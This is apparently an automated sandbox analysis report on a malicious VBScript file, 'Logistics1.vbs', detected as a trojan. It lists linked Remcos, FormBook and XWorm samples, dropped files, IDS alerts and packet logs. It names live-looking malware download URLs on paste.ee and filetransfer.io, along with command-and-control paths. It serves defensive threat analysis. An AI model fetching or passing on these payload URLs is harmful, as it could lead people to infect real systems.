                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                          Number of analysed new started processes analysed:14
                          Number of new started drivers analysed:0
                          Number of existing processes analysed:0
                          Number of existing drivers analysed:0
                          Number of injected processes analysed:0
                          Technologies:
                          • HCA enabled
                          • EGA enabled
                          • AMSI enabled
                          Analysis Mode:default
                          Analysis stop reason:Timeout
                          Sample name:Logistics1.vbs
                          Detection:MAL
                          Classification:mal100.troj.expl.evad.winVBS@17/7@2/3
                          EGA Information:
                          • Successful, ratio: 25%
                          HCA Information:
                          • Successful, ratio: 91%
                          • Number of executed functions: 25
                          • Number of non-executed functions: 237
                          Cookbook Comments:
                          • Found application associated with file extension: .vbs
                          • Stop behavior analysis, all processes terminated
                          • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, SIHClient.exe, conhost.exe
                          • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, fe3cr.delivery.mp.microsoft.com
                          • Execution Graph export aborted for target powershell.exe, PID 7792 because it is empty
                          • Execution Graph export aborted for target powershell.exe, PID 7892 because it is empty
                          • Execution Graph export aborted for target powershell.exe, PID 8004 because it is empty
                          • Not all processes where analyzed, report is missing behavior information
                          • Report size getting too big, too many NtOpenKeyEx calls found.
                          • Report size getting too big, too many NtProtectVirtualMemory calls found.
                          • Report size getting too big, too many NtQueryValueKey calls found.
                          • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                          TimeTypeDescription
                          03:28:57API Interceptor44x Sleep call for process: powershell.exe modified
                          03:29:27API Interceptor3x Sleep call for process: appidtel.exe modified
                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                          188.114.96.3octux.exe.exeGet hashmaliciousUnknownBrowse
                          • servicetelemetryserver.shop/api/index.php
                          bX8NyyjOFz.exeGet hashmaliciousFormBookBrowse
                          • www.rtprajalojago.live/2uvi/
                          lWfpGAu3ao.exeGet hashmaliciousFormBookBrowse
                          • www.serverplay.live/71nl/
                          sa7Bw41TUq.exeGet hashmaliciousFormBookBrowse
                          • www.cc101.pro/0r21/
                          E_receipt.vbsGet hashmaliciousUnknownBrowse
                          • paste.ee/d/VO2TX
                          QUOTATION_OCTQTRA071244#U00faPDF.scr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                          • filetransfer.io/data-package/fOmsJ2bL/download
                          NARLOG 08.10.2024.exeGet hashmaliciousFormBookBrowse
                          • www.thetahostthe.top/9r5x/
                          RFQ 245801.exeGet hashmaliciousFormBookBrowse
                          • www.j88.travel/c24t/?9rm4ULV=iDjdFcjw5QZJ8NeJJL4ZS/2sliUdDJEhqWnTSCKxgeFtQoD7uajT9bZ2+m2NwmP2xDXw&D4hl2=fT-dvVK08nUDKdF
                          74qgPmarBM.exeGet hashmaliciousPonyBrowse
                          • kuechenundmehr.com/x.htm
                          PURCHASE ORDER-6350.exeGet hashmaliciousFormBookBrowse
                          • www.cc101.pro/ttiz/
                          207.241.227.242n92fR6j8tl.rtfGet hashmaliciousRemcosBrowse
                            SWIFT 103 202410071251443120 071024-pdf.vbsGet hashmaliciousRemcosBrowse
                              asegurar.vbsGet hashmaliciousUnknownBrowse
                                Maersk BL, IN & PL.xlsGet hashmaliciousRemcosBrowse
                                  QPS-36477.xlsGet hashmaliciousRemcosBrowse
                                    ordin de plat#U0103.docxGet hashmaliciousRemcosBrowse
                                      SWIFT 103 202410071519130850 071024.pdf.vbsGet hashmaliciousRemcosBrowse
                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                        paste.eeSWIFT 103 202410071251443120 071024-pdf.vbsGet hashmaliciousRemcosBrowse
                                        • 188.114.97.3
                                        Quotation request YN2024-10-07pdf.vbsGet hashmaliciousRemcosBrowse
                                        • 188.114.96.3
                                        E_receipt.vbsGet hashmaliciousUnknownBrowse
                                        • 188.114.96.3
                                        SWIFT 103 202410071519130850 071024.pdf.vbsGet hashmaliciousRemcosBrowse
                                        • 188.114.97.3
                                        scan_374783.jsGet hashmaliciousAgentTeslaBrowse
                                        • 188.114.97.3
                                        Payment.vbsGet hashmaliciousFormBookBrowse
                                        • 188.114.96.3
                                        PAYMENT SPECIFIKACIJA 364846637-pdf.vbsGet hashmaliciousRemcosBrowse
                                        • 188.114.97.3
                                        k4STQvJ6rV.vbsGet hashmaliciousXWormBrowse
                                        • 188.114.97.3
                                        Quotation request YN2024-10-07pdf.vbsGet hashmaliciousRemcosBrowse
                                        • 188.114.96.3
                                        Urgent Purchase Order (P.O.) No.477764107102024.vbsGet hashmaliciousRemcosBrowse
                                        • 188.114.96.3
                                        ia600102.us.archive.orgn92fR6j8tl.rtfGet hashmaliciousRemcosBrowse
                                        • 207.241.227.242
                                        SWIFT 103 202410071251443120 071024-pdf.vbsGet hashmaliciousRemcosBrowse
                                        • 207.241.227.242
                                        asegurar.vbsGet hashmaliciousUnknownBrowse
                                        • 207.241.227.242
                                        Maersk BL, IN & PL.xlsGet hashmaliciousRemcosBrowse
                                        • 207.241.227.242
                                        QPS-36477.xlsGet hashmaliciousRemcosBrowse
                                        • 207.241.227.242
                                        ordin de plat#U0103.docxGet hashmaliciousRemcosBrowse
                                        • 207.241.227.242
                                        SWIFT 103 202410071519130850 071024.pdf.vbsGet hashmaliciousRemcosBrowse
                                        • 207.241.227.242
                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                        INTERNET-ARCHIVEUSn92fR6j8tl.rtfGet hashmaliciousRemcosBrowse
                                        • 207.241.227.242
                                        SWIFT 103 202410071251443120 071024-pdf.vbsGet hashmaliciousRemcosBrowse
                                        • 207.241.227.242
                                        asegurar.vbsGet hashmaliciousUnknownBrowse
                                        • 207.241.227.242
                                        Maersk BL, IN & PL.xlsGet hashmaliciousRemcosBrowse
                                        • 207.241.227.242
                                        QPS-36477.xlsGet hashmaliciousRemcosBrowse
                                        • 207.241.227.242
                                        ordin de plat#U0103.docxGet hashmaliciousRemcosBrowse
                                        • 207.241.227.242
                                        SWIFT 103 202410071519130850 071024.pdf.vbsGet hashmaliciousRemcosBrowse
                                        • 207.241.227.242
                                        beNwFiUxpf.rtfGet hashmaliciousRemcos, PureLog StealerBrowse
                                        • 207.241.227.240
                                        e6y2SzRzyr.vbsGet hashmaliciousPureLog StealerBrowse
                                        • 207.241.227.240
                                        Wg3tf5MIzS.vbsGet hashmaliciousPureLog StealerBrowse
                                        • 207.241.227.240
                                        CLOUDFLARENETUSQuarantined Messages(11).zipGet hashmaliciousHTMLPhisherBrowse
                                        • 104.17.25.14
                                        https://w7950.app.blinkops.com/Get hashmaliciousUnknownBrowse
                                        • 104.16.117.116
                                        file.exeGet hashmaliciousLummaCBrowse
                                        • 104.21.53.8
                                        PO-95958694495545.xlsGet hashmaliciousRemcosBrowse
                                        • 188.114.96.3
                                        zYlQoif21X.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, StealcBrowse
                                        • 172.67.206.204
                                        MV STARSHIP AQUILA_pdf.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                        • 104.21.56.207
                                        Rechnung0192839182.pdfGet hashmaliciousUnknownBrowse
                                        • 172.66.0.227
                                        4F08j2Rmd9.binGet hashmaliciousXmrigBrowse
                                        • 172.67.74.152
                                        file.exeGet hashmaliciousLummaCBrowse
                                        • 104.21.53.8
                                        https://aboriginal-investment-proposal.squarespace.com/Get hashmaliciousUnknownBrowse
                                        • 188.114.97.3
                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                        3b5074b1b5d032e5620f69f9f700ff0e5y3FUtMSB5.exeGet hashmaliciousQuasarBrowse
                                        • 188.114.96.3
                                        • 207.241.227.242
                                        Rechnung0192839182.pdfGet hashmaliciousUnknownBrowse
                                        • 188.114.96.3
                                        • 207.241.227.242
                                        https://subsale24h.com/Get hashmaliciousUnknownBrowse
                                        • 188.114.96.3
                                        • 207.241.227.242
                                        https://unscsupply.goshopgaming.com/?bypass-cdn=1Get hashmaliciousUnknownBrowse
                                        • 188.114.96.3
                                        • 207.241.227.242
                                        https://krebsonsecurity.com/2024/10/patch-tuesday-october-2024-editionGet hashmaliciousUnknownBrowse
                                        • 188.114.96.3
                                        • 207.241.227.242
                                        p61Wb0tocl.exeGet hashmaliciousXWormBrowse
                                        • 188.114.96.3
                                        • 207.241.227.242
                                        432mtXKD3l.exeGet hashmaliciousXWormBrowse
                                        • 188.114.96.3
                                        • 207.241.227.242
                                        sUdsWh0FL4.exeGet hashmaliciousXWormBrowse
                                        • 188.114.96.3
                                        • 207.241.227.242
                                        1yvSMiC8Jt.exeGet hashmaliciousXWormBrowse
                                        • 188.114.96.3
                                        • 207.241.227.242
                                        WCA-Cooperative-Agreement.docx.exeGet hashmaliciousBabadeda, Exela Stealer, Python Stealer, Waltuhium GrabberBrowse
                                        • 188.114.96.3
                                        • 207.241.227.242
                                        No context
                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):64
                                        Entropy (8bit):0.34726597513537405
                                        Encrypted:false
                                        SSDEEP:3:Nlll:Nll
                                        MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                        SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                        SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                        SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                        Malicious:false
                                        Preview:@...e...........................................................
                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:ASCII text, with no line terminators
                                        Category:dropped
                                        Size (bytes):60
                                        Entropy (8bit):4.038920595031593
                                        Encrypted:false
                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                        Malicious:false
                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:ASCII text, with no line terminators
                                        Category:dropped
                                        Size (bytes):60
                                        Entropy (8bit):4.038920595031593
                                        Encrypted:false
                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                        Malicious:false
                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:ASCII text, with no line terminators
                                        Category:dropped
                                        Size (bytes):60
                                        Entropy (8bit):4.038920595031593
                                        Encrypted:false
                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                        Malicious:false
                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:ASCII text, with no line terminators
                                        Category:dropped
                                        Size (bytes):60
                                        Entropy (8bit):4.038920595031593
                                        Encrypted:false
                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                        Malicious:false
                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:ASCII text, with no line terminators
                                        Category:dropped
                                        Size (bytes):60
                                        Entropy (8bit):4.038920595031593
                                        Encrypted:false
                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                        Malicious:false
                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:ASCII text, with no line terminators
                                        Category:dropped
                                        Size (bytes):60
                                        Entropy (8bit):4.038920595031593
                                        Encrypted:false
                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                        Malicious:false
                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                        File type:Unicode text, UTF-16, little-endian text, with CRLF, CR line terminators
                                        Entropy (8bit):3.737039734314224
                                        TrID:
                                        • Text - UTF-16 (LE) encoded (2002/1) 64.44%
                                        • MP3 audio (1001/1) 32.22%
                                        • Lumena CEL bitmap (63/63) 2.03%
                                        • Corel Photo Paint (41/41) 1.32%
                                        File name:Logistics1.vbs
                                        File size:197'102 bytes
                                        MD5:932031ace12970e0b4ebbf866caebf8d
                                        SHA1:83c48bf1a066adf5c8a32cb14187af5697778b5c
                                        SHA256:5fd68faf4d253cd50d2598eba5fe49f80899ba8c0fc613763a790f6132ecf071
                                        SHA512:f3ae6b322f1faf2588ada44c583b4a330e59e1faf5a2ba3a96a369e56252a86f9432f7b06b13861582e35e7f053516359849cda7884eefd581d3513f9b3f0e09
                                        SSDEEP:3072:i1/N2uHfR+PAG9ROfZUZgt5pCGwkZ6776HCLDkuOgtPXbkDuOVKaq4D8g:itNhHZYR4G7EfgtPgiRCf
                                        TLSH:DD14390226EA7008F1F32F569AF959B84F77B959693D821D648C1E4E1BE3E80CD117B3
                                        File Content Preview:..p.r.i.v.a.t.e. .f.u.n.c.t.i.o.n. .m.e.r.e.n.d.i.b.a.(.a.p.a.t.i.f.a.r.,. .v.a.s.s.o.u.r.a.r.,. .c.h.r.o.n.i.c.a.m.e.n.t.e.,. .r.e.b.o.q.u.e.i.r.o.,. .v.i.d.a.)..... . . . .d.i.m. .f.i.l.t.e.r..... . . . .d.i.m. .d.i.a.l.e.c.t..... . . . .d.i.m. .e.....
                                        Icon Hash:68d69b8f86ab9a86
                                        TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                        2024-10-10T09:29:05.015472+02002049038ET MALWARE Malicious Base64 Encoded Payload In Image1207.241.227.242443192.168.2.849706TCP
                                        2024-10-10T09:29:06.325617+02002841075ETPRO MALWARE Terse Request to paste .ee - Possible Download1192.168.2.849708188.114.96.3443TCP
                                        TimestampSource PortDest PortSource IPDest IP
                                        Oct 10, 2024 09:28:59.569032907 CEST49706443192.168.2.8207.241.227.242
                                        Oct 10, 2024 09:28:59.569077969 CEST44349706207.241.227.242192.168.2.8
                                        Oct 10, 2024 09:28:59.569298983 CEST49706443192.168.2.8207.241.227.242
                                        Oct 10, 2024 09:28:59.578166962 CEST49706443192.168.2.8207.241.227.242
                                        Oct 10, 2024 09:28:59.578185081 CEST44349706207.241.227.242192.168.2.8
                                        Oct 10, 2024 09:29:00.341352940 CEST44349706207.241.227.242192.168.2.8
                                        Oct 10, 2024 09:29:00.341417074 CEST49706443192.168.2.8207.241.227.242
                                        Oct 10, 2024 09:29:00.345323086 CEST49706443192.168.2.8207.241.227.242
                                        Oct 10, 2024 09:29:00.345330954 CEST44349706207.241.227.242192.168.2.8
                                        Oct 10, 2024 09:29:00.345557928 CEST44349706207.241.227.242192.168.2.8
                                        Oct 10, 2024 09:29:00.357270002 CEST49706443192.168.2.8207.241.227.242
                                        Oct 10, 2024 09:29:00.399410009 CEST44349706207.241.227.242192.168.2.8
                                        Oct 10, 2024 09:29:00.626171112 CEST44349706207.241.227.242192.168.2.8
                                        Oct 10, 2024 09:29:00.626199961 CEST44349706207.241.227.242192.168.2.8
                                        Oct 10, 2024 09:29:00.626226902 CEST44349706207.241.227.242192.168.2.8
                                        Oct 10, 2024 09:29:00.626265049 CEST49706443192.168.2.8207.241.227.242
                                        Oct 10, 2024 09:29:00.626286983 CEST44349706207.241.227.242192.168.2.8
                                        Oct 10, 2024 09:29:00.626312017 CEST49706443192.168.2.8207.241.227.242
                                        Oct 10, 2024 09:29:00.626336098 CEST49706443192.168.2.8207.241.227.242
                                        Oct 10, 2024 09:29:00.649374962 CEST44349706207.241.227.242192.168.2.8
                                        Oct 10, 2024 09:29:00.649393082 CEST44349706207.241.227.242192.168.2.8
                                        Oct 10, 2024 09:29:00.649451017 CEST49706443192.168.2.8207.241.227.242
                                        Oct 10, 2024 09:29:00.649462938 CEST44349706207.241.227.242192.168.2.8
                                        Oct 10, 2024 09:29:00.649501085 CEST49706443192.168.2.8207.241.227.242
                                        Oct 10, 2024 09:29:00.649519920 CEST49706443192.168.2.8207.241.227.242
                                        Oct 10, 2024 09:29:00.692102909 CEST44349706207.241.227.242192.168.2.8
                                        Oct 10, 2024 09:29:00.692120075 CEST44349706207.241.227.242192.168.2.8
                                        Oct 10, 2024 09:29:00.692222118 CEST49706443192.168.2.8207.241.227.242
                                        Oct 10, 2024 09:29:00.692231894 CEST44349706207.241.227.242192.168.2.8
                                        Oct 10, 2024 09:29:00.692276001 CEST49706443192.168.2.8207.241.227.242
                                        Oct 10, 2024 09:29:00.737251997 CEST44349706207.241.227.242192.168.2.8
                                        Oct 10, 2024 09:29:00.737268925 CEST44349706207.241.227.242192.168.2.8
                                        Oct 10, 2024 09:29:00.737373114 CEST49706443192.168.2.8207.241.227.242
                                        Oct 10, 2024 09:29:00.737395048 CEST44349706207.241.227.242192.168.2.8
                                        Oct 10, 2024 09:29:00.737432003 CEST49706443192.168.2.8207.241.227.242
                                        Oct 10, 2024 09:29:00.738456011 CEST44349706207.241.227.242192.168.2.8
                                        Oct 10, 2024 09:29:00.738471985 CEST44349706207.241.227.242192.168.2.8
                                        Oct 10, 2024 09:29:00.738521099 CEST49706443192.168.2.8207.241.227.242
                                        Oct 10, 2024 09:29:00.738529921 CEST44349706207.241.227.242192.168.2.8
                                        Oct 10, 2024 09:29:00.738550901 CEST49706443192.168.2.8207.241.227.242
                                        Oct 10, 2024 09:29:00.738574982 CEST49706443192.168.2.8207.241.227.242
                                        Oct 10, 2024 09:29:00.740083933 CEST44349706207.241.227.242192.168.2.8
                                        Oct 10, 2024 09:29:00.740102053 CEST44349706207.241.227.242192.168.2.8
                                        Oct 10, 2024 09:29:00.740153074 CEST49706443192.168.2.8207.241.227.242
                                        Oct 10, 2024 09:29:00.740159988 CEST44349706207.241.227.242192.168.2.8
                                        Oct 10, 2024 09:29:00.740197897 CEST49706443192.168.2.8207.241.227.242
                                        Oct 10, 2024 09:29:00.803263903 CEST44349706207.241.227.242192.168.2.8
                                        Oct 10, 2024 09:29:00.803296089 CEST44349706207.241.227.242192.168.2.8
                                        Oct 10, 2024 09:29:00.803376913 CEST49706443192.168.2.8207.241.227.242
                                        Oct 10, 2024 09:29:00.803416967 CEST44349706207.241.227.242192.168.2.8
                                        Oct 10, 2024 09:29:00.803440094 CEST49706443192.168.2.8207.241.227.242
                                        Oct 10, 2024 09:29:00.806941986 CEST49706443192.168.2.8207.241.227.242
                                        Oct 10, 2024 09:29:00.826050997 CEST44349706207.241.227.242192.168.2.8
                                        Oct 10, 2024 09:29:00.826080084 CEST44349706207.241.227.242192.168.2.8
                                        Oct 10, 2024 09:29:00.826201916 CEST49706443192.168.2.8207.241.227.242
                                        Oct 10, 2024 09:29:00.826232910 CEST44349706207.241.227.242192.168.2.8
                                        Oct 10, 2024 09:29:00.826867104 CEST44349706207.241.227.242192.168.2.8
                                        Oct 10, 2024 09:29:00.826894045 CEST44349706207.241.227.242192.168.2.8
                                        Oct 10, 2024 09:29:00.826937914 CEST49706443192.168.2.8207.241.227.242
                                        Oct 10, 2024 09:29:00.826946974 CEST44349706207.241.227.242192.168.2.8
                                        Oct 10, 2024 09:29:00.826968908 CEST49706443192.168.2.8207.241.227.242
                                        Oct 10, 2024 09:29:00.827003002 CEST49706443192.168.2.8207.241.227.242
                                        Oct 10, 2024 09:29:00.828155994 CEST44349706207.241.227.242192.168.2.8
                                        Oct 10, 2024 09:29:00.828176975 CEST44349706207.241.227.242192.168.2.8
                                        Oct 10, 2024 09:29:00.828227043 CEST49706443192.168.2.8207.241.227.242
                                        Oct 10, 2024 09:29:00.828233004 CEST44349706207.241.227.242192.168.2.8
                                        Oct 10, 2024 09:29:00.828273058 CEST49706443192.168.2.8207.241.227.242
                                        Oct 10, 2024 09:29:00.829117060 CEST44349706207.241.227.242192.168.2.8
                                        Oct 10, 2024 09:29:00.829134941 CEST44349706207.241.227.242192.168.2.8
                                        Oct 10, 2024 09:29:00.829181910 CEST49706443192.168.2.8207.241.227.242
                                        Oct 10, 2024 09:29:00.829186916 CEST44349706207.241.227.242192.168.2.8
                                        Oct 10, 2024 09:29:00.830130100 CEST44349706207.241.227.242192.168.2.8
                                        Oct 10, 2024 09:29:00.830156088 CEST44349706207.241.227.242192.168.2.8
                                        Oct 10, 2024 09:29:00.830208063 CEST49706443192.168.2.8207.241.227.242
                                        Oct 10, 2024 09:29:00.830214024 CEST44349706207.241.227.242192.168.2.8
                                        Oct 10, 2024 09:29:00.830240011 CEST49706443192.168.2.8207.241.227.242
                                        Oct 10, 2024 09:29:00.830265999 CEST49706443192.168.2.8207.241.227.242
                                        Oct 10, 2024 09:29:00.869071007 CEST44349706207.241.227.242192.168.2.8
                                        Oct 10, 2024 09:29:00.869096994 CEST44349706207.241.227.242192.168.2.8
                                        Oct 10, 2024 09:29:00.869194984 CEST49706443192.168.2.8207.241.227.242
                                        Oct 10, 2024 09:29:00.869225979 CEST44349706207.241.227.242192.168.2.8
                                        Oct 10, 2024 09:29:00.874017954 CEST49706443192.168.2.8207.241.227.242
                                        Oct 10, 2024 09:29:00.891782999 CEST44349706207.241.227.242192.168.2.8
                                        Oct 10, 2024 09:29:00.891804934 CEST44349706207.241.227.242192.168.2.8
                                        Oct 10, 2024 09:29:00.891875982 CEST49706443192.168.2.8207.241.227.242
                                        Oct 10, 2024 09:29:00.891901970 CEST44349706207.241.227.242192.168.2.8
                                        Oct 10, 2024 09:29:00.891940117 CEST49706443192.168.2.8207.241.227.242
                                        Oct 10, 2024 09:29:00.914431095 CEST44349706207.241.227.242192.168.2.8
                                        Oct 10, 2024 09:29:00.914458036 CEST44349706207.241.227.242192.168.2.8
                                        Oct 10, 2024 09:29:00.914506912 CEST49706443192.168.2.8207.241.227.242
                                        Oct 10, 2024 09:29:00.914536953 CEST44349706207.241.227.242192.168.2.8
                                        Oct 10, 2024 09:29:00.914549112 CEST49706443192.168.2.8207.241.227.242
                                        Oct 10, 2024 09:29:00.914912939 CEST49706443192.168.2.8207.241.227.242
                                        Oct 10, 2024 09:29:00.915191889 CEST44349706207.241.227.242192.168.2.8
                                        Oct 10, 2024 09:29:00.915209055 CEST44349706207.241.227.242192.168.2.8
                                        Oct 10, 2024 09:29:00.915246964 CEST49706443192.168.2.8207.241.227.242
                                        Oct 10, 2024 09:29:00.915252924 CEST44349706207.241.227.242192.168.2.8
                                        Oct 10, 2024 09:29:00.915273905 CEST49706443192.168.2.8207.241.227.242
                                        Oct 10, 2024 09:29:00.915288925 CEST49706443192.168.2.8207.241.227.242
                                        Oct 10, 2024 09:29:00.915630102 CEST44349706207.241.227.242192.168.2.8
                                        Oct 10, 2024 09:29:00.915657997 CEST44349706207.241.227.242192.168.2.8
                                        Oct 10, 2024 09:29:00.915699959 CEST49706443192.168.2.8207.241.227.242
                                        Oct 10, 2024 09:29:00.915705919 CEST44349706207.241.227.242192.168.2.8
                                        Oct 10, 2024 09:29:00.915764093 CEST49706443192.168.2.8207.241.227.242
                                        Oct 10, 2024 09:29:00.915838003 CEST49706443192.168.2.8207.241.227.242
                                        Oct 10, 2024 09:29:00.916491985 CEST44349706207.241.227.242192.168.2.8
                                        Oct 10, 2024 09:29:00.916511059 CEST44349706207.241.227.242192.168.2.8
                                        Oct 10, 2024 09:29:00.916546106 CEST49706443192.168.2.8207.241.227.242
                                        Oct 10, 2024 09:29:00.916555882 CEST44349706207.241.227.242192.168.2.8
                                        Oct 10, 2024 09:29:00.916580915 CEST49706443192.168.2.8207.241.227.242
                                        Oct 10, 2024 09:29:00.916599035 CEST49706443192.168.2.8207.241.227.242
                                        Oct 10, 2024 09:29:00.916759014 CEST44349706207.241.227.242192.168.2.8
                                        Oct 10, 2024 09:29:00.916781902 CEST44349706207.241.227.242192.168.2.8
                                        Oct 10, 2024 09:29:00.916821003 CEST49706443192.168.2.8207.241.227.242
                                        Oct 10, 2024 09:29:00.916827917 CEST44349706207.241.227.242192.168.2.8
                                        Oct 10, 2024 09:29:00.916855097 CEST49706443192.168.2.8207.241.227.242
                                        Oct 10, 2024 09:29:00.916882038 CEST49706443192.168.2.8207.241.227.242
                                        Oct 10, 2024 09:29:00.917578936 CEST44349706207.241.227.242192.168.2.8
                                        Oct 10, 2024 09:29:00.917597055 CEST44349706207.241.227.242192.168.2.8
                                        Oct 10, 2024 09:29:00.917639971 CEST49706443192.168.2.8207.241.227.242
                                        Oct 10, 2024 09:29:00.917645931 CEST44349706207.241.227.242192.168.2.8
                                        Oct 10, 2024 09:29:00.917669058 CEST49706443192.168.2.8207.241.227.242
                                        Oct 10, 2024 09:29:00.917687893 CEST49706443192.168.2.8207.241.227.242
                                        Oct 10, 2024 09:29:00.957715034 CEST44349706207.241.227.242192.168.2.8
                                        Oct 10, 2024 09:29:00.957746983 CEST44349706207.241.227.242192.168.2.8
                                        Oct 10, 2024 09:29:00.957823038 CEST49706443192.168.2.8207.241.227.242
                                        Oct 10, 2024 09:29:00.957834005 CEST44349706207.241.227.242192.168.2.8
                                        Oct 10, 2024 09:29:00.957880020 CEST49706443192.168.2.8207.241.227.242
                                        Oct 10, 2024 09:29:00.980519056 CEST44349706207.241.227.242192.168.2.8
                                        Oct 10, 2024 09:29:00.980552912 CEST44349706207.241.227.242192.168.2.8
                                        Oct 10, 2024 09:29:00.980626106 CEST49706443192.168.2.8207.241.227.242
                                        Oct 10, 2024 09:29:00.980654001 CEST44349706207.241.227.242192.168.2.8
                                        Oct 10, 2024 09:29:00.980673075 CEST49706443192.168.2.8207.241.227.242
                                        Oct 10, 2024 09:29:00.982938051 CEST49706443192.168.2.8207.241.227.242
                                        Oct 10, 2024 09:29:01.003963947 CEST44349706207.241.227.242192.168.2.8
                                        Oct 10, 2024 09:29:01.003992081 CEST44349706207.241.227.242192.168.2.8
                                        Oct 10, 2024 09:29:01.004093885 CEST49706443192.168.2.8207.241.227.242
                                        Oct 10, 2024 09:29:01.004129887 CEST44349706207.241.227.242192.168.2.8
                                        Oct 10, 2024 09:29:01.004148006 CEST49706443192.168.2.8207.241.227.242
                                        Oct 10, 2024 09:29:01.004297972 CEST44349706207.241.227.242192.168.2.8
                                        Oct 10, 2024 09:29:01.004322052 CEST44349706207.241.227.242192.168.2.8
                                        Oct 10, 2024 09:29:01.004357100 CEST49706443192.168.2.8207.241.227.242
                                        Oct 10, 2024 09:29:01.004364967 CEST44349706207.241.227.242192.168.2.8
                                        Oct 10, 2024 09:29:01.004383087 CEST49706443192.168.2.8207.241.227.242
                                        Oct 10, 2024 09:29:01.004415989 CEST49706443192.168.2.8207.241.227.242
                                        Oct 10, 2024 09:29:01.004687071 CEST44349706207.241.227.242192.168.2.8
                                        Oct 10, 2024 09:29:01.004704952 CEST44349706207.241.227.242192.168.2.8
                                        Oct 10, 2024 09:29:01.004756927 CEST49706443192.168.2.8207.241.227.242
                                        Oct 10, 2024 09:29:01.004765034 CEST44349706207.241.227.242192.168.2.8
                                        Oct 10, 2024 09:29:01.004777908 CEST49706443192.168.2.8207.241.227.242
                                        Oct 10, 2024 09:29:01.004801989 CEST49706443192.168.2.8207.241.227.242
